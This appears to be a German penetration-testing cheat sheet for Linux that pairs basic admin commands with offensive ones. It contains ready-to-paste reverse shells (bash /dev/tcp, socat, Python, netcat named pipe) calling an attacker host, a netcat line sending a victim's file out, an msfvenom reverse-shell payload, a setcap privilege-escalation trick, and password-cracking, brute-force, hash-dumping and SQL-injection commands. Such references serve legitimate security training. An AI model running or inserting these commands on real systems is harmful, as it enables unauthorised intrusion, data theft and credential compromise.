Cheatsheet (exkl. Win)
🖥️ System Basics
System‑Info
uname -a # Kernel + Architektur
cat /etc/os-release # Distro‑Details
lscpu | head # CPU‑Info
free -m # RAM
uptime -p # Laufzeit
whoami && id # Aktueller User + Privs
hostname -I # Lokale IP‑AdressenProzess & Service
ps aux | head # Laufende Prozesse (erste 10)
top / htop # Live‑Übersicht
pgrep -u <USER> bash # PIDs des Users finden
pkill -9 <PID> # Prozess hart killen
systemctl status <SERVICE> # Service‑Status
systemctl restart <SERVICE> # Service neu startenDateien & Suche
find . -type f -name "*.php" # Rekursive Dateisuche
grep -R "password" . # Inhalt suchen
sed -n '1,20p' <FILE> # Zeilen anzeigen
awk -F: '{print $1}' /etc/passwd # Feld extrahieren
xargs -a list.txt rm # Batch‑Aktion
sort | uniq -c | sort -nr # Duplikate zählen
head -n 50 <FILE>; tail -n 20 <FILE> # Anfang & EndeBerechtigungen
chmod 755 <FILE> # Rechte setzen (rwxr‑xr‑x)
chown <USER>:<GROUP> <FILE> # Besitzer ändern
getfacl <FILE> # ACL anzeigen
setfacl -m u:<USER>:r <FILE> # ACL setzen
getcap -r / 2>/dev/null # Linux‑Capabilities finden
setcap cap_setuid+ep /bin/bash # Beispiel: SUID‑ähnlichPaket & Updates
apt update && apt upgrade -y # Debian/Ubuntu
yum update -y # CentOS/RHEL
pacman -Syu # ArchDisk & RAM & Network‑Übersicht
df -h # Plattenbelegung
du -sh * | sort -h # Ordnergrössen
ss -tulpn | head # Offene Ports (tcp/udp, listening)
ip a # Interfaces
ip route # Routing‑Tabelle
tcpdump -i <IFACE> port 80 -c 10 # 10 Pakete auf Port 80 mitschneidenArchivierung & Kompression
# TAR
tar -xvf <FILE>.tar # Extract
tar -xzvf <FILE>.tar.gz # mit gzip
tar -cvf <ARCHIVE>.tar <DIR>/ # Packen
# ZIP
zip -r <ARCHIVE>.zip <DIR>/ # Packen
unzip <FILE>.zip # Entpacken
# 7Z
7z a <ARCHIVE>.7z <DIR>/ # Packen
7z x <FILE>.7z # EntpackenQuick Transfer & Listener
python3 -m http.server 8000 # Mini‑HTTP‑Server im aktuellen Pfad
php -S 0.0.0.0:8000 # PHP‑Server – gut für Uploads
nc -lvnp <LPORT> > <OUT.FILE> # Datei empfangen (Listener‑Host)
nc <ATTACKER_IP> <LPORT> < <IN.FILE> # Datei senden (Opfer)
scp <FILE> <USER>@<HOST>:/tmp # SCP Copy
rsync -avz <DIR>/ <USER>@<HOST>:/tmp # Schnelles Delta‑CopyReverse‑Shells (inkl. TTY‑Fix)
# Bash 1‑Liner
bash -i >& /dev/tcp/<ATTACKER_IP>/<LPORT> 0>&1
# Socat (stabil, vollwertiges TTY)
# Listener
socat TCP-LISTEN:<LPORT>,reuseaddr,fork STDOUT,stderr
# Opfer‑Shell
a=</bin/bash; socat TCP:<ATTACKER_IP>:<LPORT> EXEC:$a,pty,stderr,setsid,sigint,sane
# Python
python3 -c 'import pty,os,socket,subprocess;s=socket.socket();s.connect(("<ATTACKER_IP>",<LPORT>));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'Git Basics
git clone <REPO_URL>
git log --oneline -n 5 # Kurze Historie
git checkout -b <BRANCH> # Neue Branch📡 Netzwerk / Enumeration
Warum? Dienste entdecken, Ports prüfen, Tunnel legen.
SSH + Tunneling (Port‑Weiterleitungen)
ssh <USER>@<HOST> # Passwort‑Login
ssh -i <KEYFILE> <USER>@<HOST> # Key‑Auth
ssh -p <PORT> <USER>@<HOST> # Anderer Port
# Local‑Forward: Zugriff auf internen Dienst über localhost:8080
ssh -L 8080:<TARGET_IP>:80 <USER>@<HOST>
# Reverse‑Forward: Expose eigenen Port 4444 IN das entfernte Netz
ssh -R 4444:localhost:4444 <USER>@<HOST>
# Dynamisch (SOCKS‑Proxy): leitet ganzen Traffic (–> ProxyChains)
ssh -D 1080 <USER>@<HOST>Netcat Tricks
# Standard‑Listener
nc -lvnp <LPORT>
# Verbinden
nc <HOST> <PORT>
# Listener mit Befehl‑History (rlwrap)
rlwrap nc -lvnp <LPORT>
# Named‑Pipe Shell – trickst EOF aus
mkfifo /tmp/f; /bin/sh 0</tmp/f | nc <ATTACKER_IP> <LPORT> >/tmp/fPort‑Scan Quickies
nmap -sC -sV -oN init <HOST> # Default‑Scripts + Versionen
nmap -p- --min-rate 1000 <HOST> # Alle Ports schnell
nmap --script vuln -oN vuln <HOST> # Vuln‑Scripts
masscan -p1-65535 --rate 10000 <HOST> # Super‑schnell (root)Web‑Fuzzing
gobuster dir -u http://<HOST> -w /usr/share/wordlists/dirb/common.txt -x php,txt -t 50
ffuf -u http://<HOST>/FUZZ -w wordlist.txt -mc 200,204,301,302
wfuzz -c -w wordlist.txt -u http://<HOST>/?file=FUZZ -hc 404SMB & Windows‑Enum
smbclient -L \\<HOST> -N # Shares listen
enum4linux-ng <HOST> # Voll‑Enum
impacket-smbserver <SHARE> . # Schneller SMB‑ServerContainer‑Blick
docker ps -a # Alle Container
docker exec -it <CONTAINER_ID> /bin/sh # Interaktiv einsteigen🔐 Passwörter & Hashes
# Hashcat – Beispiele
hashcat -m 0 -a 0 <HASHFILE> rockyou.txt # MD5 Wordlist‑Attacke
hashcat -a 3 -m 1800 <HASHFILE> ?a?a?a?a?a?a # Bruteforce sha512crypt
# John
john <HASHFILE> --wordlist=rockyou.txt
john --show <HASHFILE>
# WPA (aircrack)
aircrack-ng <CAPTURE>.cap -w rockyou.txt
# Openssl – Passwort & File‑Crypto
openssl passwd -1 -salt <SALT> <PASSWORD> # MD5‑Crypt Hash
openssl enc -aes-256-cbc -in <FILE> -out <FILE>.enc -k <PASS>
openssl enc -d -aes-256-cbc -in <FILE>.enc -out <FILE> -k <PASS>
# Base64 Encode/Decode
echo -n "text" | base64
echo "dGV4dA==" | base64 -d📚 Privilege Escalation Quick‑Wins
sudo -l # Welche Befehle darf ich mit sudo?
find / -perm -4000 -type f 2>/dev/null | grep -v "bin" # SUID‑Files ohne Standard‑Bins
linpeas.sh / winpeas.exe # Automatisierte Enum
getcap -r / 2>/dev/null # Capabilities suchen
capsh --print # Aktive Cap‑Sets🛠️ OffSec‑Tools
Gruppiert nach Einsatzzweck. Meist genügen Basis‑Args plus Wordlisten.
Scanning & Enum
nmap, masscan, rustscan
amass enum -d <DOMAIN> -o enum.txt # Sub‑Domains
subfinder -d <DOMAIN>Web Fuzz & Vuln
gobuster, ffuf, wfuzz, dirsearch
nikto -h http://<HOST>
wpscan --url http://<HOST>Exploit & PoC
searchsploit <SOFTWARE> <VERSION>
msfconsole -> search <CVE> ; use exploit/... ; set RHOSTS <HOST> ; run
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<ATTACKER_IP> LPORT=<LPORT> -f elf > rev.elfPassword & Hash Attack
hydra -l <USER> -P rockyou.txt <HOST> http-get /login
medusa -u <USER> -P rockyou.txt -h <HOST> -M sshLateral Movement / Impacket
impacket-psExec <DOMAIN>/<USER>:<PASS>@<HOST> # Remote CMD
impacket-secretsdump -sam -system -security LOCAL <HOST> # Hash‑Dump
impacket-smbserver <SHARE> . # Drop‑ZoneSQL & DB
sqlmap -u "http://<HOST>/vuln.php?id=1" --dbs --batch
sqlite3 <DBFILE> ".tables"Packet & Traffic
tcpdump -i <IFACE> -w capture.pcap
wireshark capture.pcap (GUI)Wordlists & Crunch
crunch 8 8 abc123 -o list.txt # Länge 8, Charset
cewl http://<HOST> -w words.txt # Wörter aus Seite⏹️ Cheatsheet Ende
Feedback? -> Ergänzen wir sofort.
Last updated